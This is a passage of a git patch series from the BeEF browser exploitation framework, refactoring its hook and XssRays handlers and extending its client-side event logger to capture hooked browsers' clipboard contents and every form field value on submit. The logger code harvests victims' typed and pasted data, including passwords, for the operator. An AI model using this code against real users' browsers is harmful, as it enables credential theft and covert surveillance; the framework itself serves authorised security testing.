-          beef_hook = @request['hbsess'] || nil
+          # raise an error if it's null or not found in the DB
+          beef_hook = params[:hbsess] || nil
           (print_error "[XSSRAYS] Invalid beefhook id: the hooked browser cannot be found in the database";return) if beef_hook.nil? || HB.first(:session => beef_hook) == nil
 
-          rays_scan_id = @request['raysid'] || nil
+          rays_scan_id = params[:raysid] || nil
           (print_error "[XSSRAYS] Raysid is null";return) if rays_scan_id.nil?
 
-          if @request['action'] == 'ray'
+          if params[:action] == 'ray'
             # we received a ray
             parse_rays(rays_scan_id)
           else
-            if @request['action'] == 'finish'
+            if params[:action] == 'finish'
               # we received a notification for finishing the scan
               finalize_scan(rays_scan_id)
             else
@@ -47,38 +45,32 @@ module BeEF
             end
           end
 
-          response = Rack::Response.new(
-              body = [],
-              status = 200,
-              header = {
-                'Pragma' => 'no-cache',
+        headers 'Pragma' => 'no-cache',
                 'Cache-Control' => 'no-cache',
                 'Expires' => '0',
                 'Content-Type' => 'text/javascript',
                 'Access-Control-Allow-Origin' => '*',
-                'Access-Control-Allow-Methods' => 'POST'
-              }
-          )
-          response
+                'Access-Control-Allow-Methods' => 'POST,GET'
+
         end
 
         # parse incoming rays: rays are verified XSS, as the attack vector is calling back BeEF when executed.
         def parse_rays(rays_scan_id)
           xssrays_scan = XS.first(:id => rays_scan_id)
-          hooked_browser = HB.first(:session => @request['hbsess'])
+          hooked_browser = HB.first(:session => params[:hbsess])
 
           if (xssrays_scan != nil)
             xssrays_detail = XD.new(
                 :hooked_browser_id => hooked_browser.id,
-                :vector_name => @request['n'],
-                :vector_method => @request['m'],
-                :vector_poc => @request['p'],
+                :vector_name => params[:n],
+                :vector_method => params[:m],
+                :vector_poc => params[:p],
                 :xssraysscan_id => xssrays_scan.id
             )
             xssrays_detail.save
           end
           print_info("[XSSRAYS] Scan id [#{xssrays_scan.id}] received ray [ip:#{hooked_browser.ip.to_s}], hooked domain [#{hooked_browser.domain.to_s}]")
-          print_debug("[XSSRAYS] Ray info: \n #{@request.query_string}")
+          print_debug("[XSSRAYS] Ray info: \n #{request.query_string}")
         end
 
         # finalize the XssRays scan marking the scan as finished in the db

From 2b77416226df34b120dc7da7cb1b864ee8f8be3b Mon Sep 17 00:00:00 2001
From: antisnatchor <antisnatchor@gmail.com>
Date: Mon, 9 Apr 2012 12:26:57 +0100
Subject: [PATCH 28/31] Issue 654: the main hook handler now extends the Router
 class

---
 core/main/handlers/hookedbrowsers.rb | 55 ++++++++++------------------
 1 file changed, 19 insertions(+), 36 deletions(-)

diff --git a/core/main/handlers/hookedbrowsers.rb b/core/main/handlers/hookedbrowsers.rb
index 4db2d59a6..a5450ac91 100644
--- a/core/main/handlers/hookedbrowsers.rb
+++ b/core/main/handlers/hookedbrowsers.rb
@@ -18,42 +18,44 @@ module Core
 module Handlers
   
    # @note This class handles connections from hooked browsers to the framework.
-    class HookedBrowsers
+    class HookedBrowsers < BeEF::Core::Router::Router
 
     
     include BeEF::Core::Handlers::Modules::BeEFJS
     include BeEF::Core::Handlers::Modules::Command
 
+    #antisnatchor: we don't want to have anti-xss/anti-framing headers in the HTTP response for the hook file.
+    configure do
+      disable :protection
+    end
     
     # Process HTTP requests sent by a hooked browser to the framework.
     # It will update the database to add or update the current hooked browser
     # and deploy some command modules or extensions to the hooked browser.
-    def call(env)
+    get '/' do
       @body = ''
-      @request = Rack::Request.new(env)
-      @params = @request.query_string
-      @response = Rack::Response.new(body=[], 200, header={})
+      @params = request.query_string
+      #@response = Rack::Response.new(body=[], 200, header={})
       config = BeEF::Core::Configuration.instance
       
       # @note check source ip address of browser
       permitted_hooking_subnet = config.get('beef.restrictions.permitted_hooking_subnet')
       target_network = IPAddr.new(permitted_hooking_subnet)
-      if not target_network.include?(@request.ip)
-        BeEF::Core::Logger.instance.register('Target Range', "Attempted hook from out of target range browser (#{@request.ip}) rejected.")
-        @response = Rack::Response.new(body=[], 500, header={})
-        return
+      if not target_network.include?(request.ip)
+        BeEF::Core::Logger.instance.register('Target Range', "Attempted hook from out of target range browser (#{request.ip}) rejected.")
+        error 500
       end
 
       # @note get zombie if already hooked the framework
       hook_session_name = config.get('beef.http.hook_session_name')
-      hook_session_id = @request[hook_session_name]
+      hook_session_id = request[hook_session_name]
       hooked_browser = BeEF::Core::Models::HookedBrowser.first(:session => hook_session_id) if not hook_session_id.nil?
 
       # @note is a new browser so return instructions to set up the hook
       if not hooked_browser 
         
         # @note generate the instructions to hook the browser
-        host_name = @request.host 
+        host_name = request.host
         (print_error "Invalid host name";return) if not BeEF::Filters.is_valid_hostname?(host_name)
         build_beefjs!(host_name)
 
@@ -63,9 +65,9 @@ module Handlers
         hooked_browser.lastseen = Time.new.to_i
         
         # @note Check for a change in zombie IP and log an event
-        if hooked_browser.ip != @request.ip
-          BeEF::Core::Logger.instance.register('Zombie',"IP address has changed from #{hooked_browser.ip} to #{@request.ip}","#{hooked_browser.id}")
-          hooked_browser.ip = @request.ip
+        if hooked_browser.ip != request.ip
+          BeEF::Core::Logger.instance.register('Zombie',"IP address has changed from #{hooked_browser.ip} to #{request.ip}","#{hooked_browser.id}")
+          hooked_browser.ip = request.ip
         end
       
         hooked_browser.count!
@@ -76,37 +78,18 @@ module Handlers
         zombie_commands.each{|command| add_command_instructions(command, hooked_browser)}
 
         # @note We dynamically get the list of all browser hook handler using the API and register them
-        BeEF::API::Registrar.instance.fire(BeEF::API::Server::Hook, 'pre_hook_send', hooked_browser, @body, @params, @request, @response)
+        BeEF::API::Registrar.instance.fire(BeEF::API::Server::Hook, 'pre_hook_send', hooked_browser, @body, @params, request, response)
       end
 
       # @note set response headers and body
-      @response = Rack::Response.new(
-            body = [@body],
-            status = 200,
-            header = {
-              'Pragma' => 'no-cache',
+     headers  'Pragma' => 'no-cache',
               'Cache-Control' => 'no-cache',
               'Expires' => '0',
               'Content-Type' => 'text/javascript',
               'Access-Control-Allow-Origin' => '*',
               'Access-Control-Allow-Methods' => 'POST, GET'
-            }
-        )
-      
+      @body
     end
-
-    private
-    
-    # @note Object representing the HTTP request
-    @request
-    
-    # @note Object representing the HTTP response
-    @response
-    
-    # @note A string containing the list of BeEF components active in the hooked browser
-    # @todo Confirm this variable is still used
-    @beef_js_cmps
-    
   end
   
 end

From 6af55c7e33b2883f2debd4208245b2f4de18bd77 Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Wed, 11 Apr 2012 14:06:56 +0930
Subject: [PATCH 29/31] Event Logger now logs clipboard events (in IE6 only)

Fixes issue# 653

Tidied up the 'submit' handler a bit. Part of issue #141
---
 core/main/client/logger.js   | 54 +++++++++++++++++++++++++++++++++++-
 extensions/events/handler.rb |  8 ++++++
 2 files changed, 61 insertions(+), 1 deletion(-)

diff --git a/core/main/client/logger.js b/core/main/client/logger.js
index 0cf765f03..b68cf8195 100644
--- a/core/main/client/logger.js
+++ b/core/main/client/logger.js
@@ -58,9 +58,11 @@ beef.logger = {
 	 * Starts the logger
 	 */
 	start: function() {
+
 		this.running = true;
 		var d = new Date();
 		this.time = d.getTime();
+
 		$j(document).keypress(
 			function(e) { beef.logger.keypress(e); }
 		).click(
@@ -74,6 +76,15 @@ beef.logger = {
 		/*$j('form').submit(
 			function(e) { beef.logger.submit(e); }
 		);*/
+		document.body.oncopy = function() {
+			setTimeout("beef.logger.copy();", 10);
+		}
+		document.body.oncut = function() {
+			setTimeout("beef.logger.cut();", 10);
+		}
+		document.body.onpaste = function() {
+			beef.logger.paste();
+		}
 	},
 	
 	/**
@@ -137,10 +148,51 @@ beef.logger = {
 	},
 	
 	/**
-	 * Is called whenever a form is submitted
+	 * Copy function fires when the user copies data to the clipboard.
+	 */
+	copy: function(x) {
+		try {
+			var c = new beef.logger.e();
+			c.type = 'copy';
+			c.data = clipboardData.getData("Text");
+			this.events.push(c);
+		} catch(e) {}
+	},
+
+	/**
+	 * Cut function fires when the user cuts data to the clipboard.
+	 */
+	cut: function() {
+		try {
+			var c = new beef.logger.e();
+			c.type = 'cut';
+			c.data = clipboardData.getData("Text");
+			this.events.push(c);
+		} catch(e) {}
+	},
+
+	/**
+	 * Paste function fires when the user pastes data from the clipboard.
+	 */
+	paste: function() {
+		try {
+			var c = new beef.logger.e();
+			c.type = 'paste';
+			c.data = clipboardData.getData("Text");
+			this.events.push(c);
+		} catch(e) {}
+	},
+
+	/**
+	 * Submit function fires whenever a form is submitted
      * TODO: Cleanup this function
 	 */
 	submit: function(e) {
+		var f = new beef.logger.e();
+		f.type = 'submit';
+		f.target = beef.logger.get_dom_identifier(e.target);
+		f.data = 'Action: '+$j(e.target).attr('action')+' - Method: '+$j(e.target).attr('method');
+		this.events.push(f);
 		/*this.events.push('Form submission: Action: '+$j(e.target).attr('action')+' Method: '+$j(e.target).attr('method')+' @ '+beef.logger.get_timestamp()+'s > '+beef.logger.get_dom_identifier(e.target));*/
 	},
 	
diff --git a/extensions/events/handler.rb b/extensions/events/handler.rb
index aeef6d204..0f5d30aa2 100644
--- a/extensions/events/handler.rb
+++ b/extensions/events/handler.rb
@@ -66,10 +66,18 @@ module Events
                 return event['time'].to_s+'s - [Mouse Click] x: '+event['x'].to_s+' y:'+event['y'].to_s+' > '+event['target'].to_s
             when 'focus'
                 return event['time'].to_s+'s - [Focus] Browser has regained focus.'
+			when 'copy'
+				return event['time'].to_s+'s - [User Copied Text] "'+event['data'].to_s+'"'
+			when 'cut'
+				return event['time'].to_s+'s - [User Cut Text] "'+event['data'].to_s+'"'
+			when 'paste'
+				return event['time'].to_s+'s - [User Pasted Text] "'+event['data'].to_s+'"'
             when 'blur'
                 return event['time'].to_s+'s - [Blur] Browser has lost focus.'
             when 'keys'
                 return event['time'].to_s+'s - [User Typed] "'+event['data'].to_s+'" > '+event['target'].to_s
+			when 'submit'
+				return event['time'].to_s+'s - [Form Submitted] '+event['data'].to_s+' > '+event['target'].to_s
         end
         print_debug '[EVENTS] Event handler has received an unknown event'
         return 'Unknown event'

From 0c0027e06f6519fa8aa8a1cc6208c11dbc960034 Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Thu, 12 Apr 2012 12:27:28 +0930
Subject: [PATCH 30/31] Event Logger now logs form submissions

Fixes issue #141
---
 core/main/client/logger.js | 21 +++++++++++++--------
 1 file changed, 13 insertions(+), 8 deletions(-)

diff --git a/core/main/client/logger.js b/core/main/client/logger.js
index b68cf8195..49f75ef1f 100644
--- a/core/main/client/logger.js
+++ b/core/main/client/logger.js
@@ -73,9 +73,9 @@ beef.logger = {
 		).blur(
 			function(e) { beef.logger.win_blur(e); }
 		);
-		/*$j('form').submit(
+		$j('form').submit(
 			function(e) { beef.logger.submit(e); }
-		);*/
+		);
 		document.body.oncopy = function() {
 			setTimeout("beef.logger.copy();", 10);
 		}
@@ -188,12 +188,17 @@ beef.logger = {
      * TODO: Cleanup this function
 	 */
 	submit: function(e) {
-		var f = new beef.logger.e();
-		f.type = 'submit';
-		f.target = beef.logger.get_dom_identifier(e.target);
-		f.data = 'Action: '+$j(e.target).attr('action')+' - Method: '+$j(e.target).attr('method');
-		this.events.push(f);
-		/*this.events.push('Form submission: Action: '+$j(e.target).attr('action')+' Method: '+$j(e.target).attr('method')+' @ '+beef.logger.get_timestamp()+'s > '+beef.logger.get_dom_identifier(e.target));*/
+		try {
+			var f = new beef.logger.e();
+			var values = "";
+			f.type = 'submit';
+			f.target = beef.logger.get_dom_identifier(e.target);
+			for (var i = 0; i < e.target.elements.length; i++) {
+	            values += "["+i+"] "+e.target.elements[i].name+"="+e.target.elements[i].value+"\n";
+	        }
+			f.data = 'Action: '+$j(e.target).attr('action')+' - Method: '+$j(e.target).attr('method') + ' - Values:\n'+values;
+			this.events.push(f);
+		} catch(e) {}
 	},
 	
 	/**

From e52b5101eef1077a69fe128a88f364ab5070fcf2 Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Thu, 12 Apr 2012 17:20:20 +0930
Subject: [PATCH 31/31] Updated logo location

The favicon is not located at /favicon.ico if web server immitation is enabled
---
 extensions/admin_ui/controllers/panel/index.html | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/extensions/admin_ui/controllers/panel/index.html b/extensions/admin_ui/controllers/panel/index.html
index 37c22d9e1..31c92c23c 100644
--- a/extensions/admin_ui/controllers/panel/index.html
+++ b/extensions/admin_ui/controllers/panel/index.html
@@ -48,7 +48,7 @@
 	<%= nonce_tag %>	
 	<div id="header">
 		<div class="right-menu">
-			<img src="/favicon.ico" alt="BeEF" title="BeEF" /> 
+			<img src="/ui/media/images/favicon.ico" alt="BeEF" title="BeEF" /> 
 			BeEF <%= BeEF::Core::Configuration.instance.get('beef.version') %> | 
 			<a id='do-submit-bug-menu' href='https://github.com/beefproject/beef/issues/new' target='_blank'>Submit Bug</a> | 
 			<a id='do-logout-menu' href='#'>Logout</a>